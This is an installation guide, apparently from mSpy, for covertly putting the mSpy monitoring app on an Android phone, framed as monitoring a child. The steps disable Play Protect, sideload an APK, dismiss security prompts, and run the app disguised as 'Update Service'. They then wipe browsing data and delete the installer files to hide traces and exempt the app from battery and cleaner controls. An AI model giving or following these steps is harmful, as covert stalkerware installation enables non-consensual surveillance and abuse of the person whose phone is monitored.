Disable PlayProtect on the device you want to monitor
1. Go to Play Store.
2. Tap on the three lines in the top left corner or the profile icon in the top right corner.
3. Find and tap Play Protect.
4. Tap on the Settings (cogwheel icon) in the top right corner.
5. Disable Scan apps with Play Protect → tap Turn off.
Download mSpy installer
1. Open a browser (Chrome, Samsung Internet, Firefox, or any other browser).
2. Tap on the address bar.
3. Type in the link getmspy.net/a and go to this website.
4. Draw the shape on the screen. Once successful, click Download → Ok.
5. Tap Open → Settings → Allow from this source → Accept.
6. Go back → hit Install → Open.
7. If a security prompt appears, press Ignore, then find an app called Update Service and open it.
IF YOU SEE A POP-UP FROM THE PLAY STORE, HIT DECLINE (THE LEFT BUTTON)
Follow the instructions you see on your kid’s phone. You can refer to the video guide if you get lost.
1. Go to Chrome (or another browser you used to download mSpy) → tap on the three dots in the top right corner → Settings (cogwheel).
2. Go to Privacy → Clear browsing data → Clear data.
3. Go to the home screen and find the File Manager.
4. Go to APKs → delete bt.apk.
5. Go to Downloads → delete bt.apk. If you see multiple bt.apk files, delete all of them.
Add mSpy to Unmonitored apps
1. Go to Settings → Apps → Manage Apps → Update Service.
2. Turn on Autostart.
3. Go to Settings → Battery & Performance.
4. Click on the Settings icon in the top right corner.
5. Tap Turn off mobile data when device is locked → Never.
6. Tap Clear cache when device is locked → Never.
7. Turn off Battery drain notifications.
8. Go to the home screen.
9. Find an app called Security.
10. Click on the Settings icon in the top right corner.
11. Tap Boost speed → Lock apps.
12. Turn on Update Service.
13. Go back to Security → Settings.
14. Tap Cleaner.
15. Turn off the Remind to clean option.
16. Go back.
17. Tap Security scan.
18. Turn off Auto updates.
Turn on Location
Pull down the extended menu from the top of the screen → enable Location.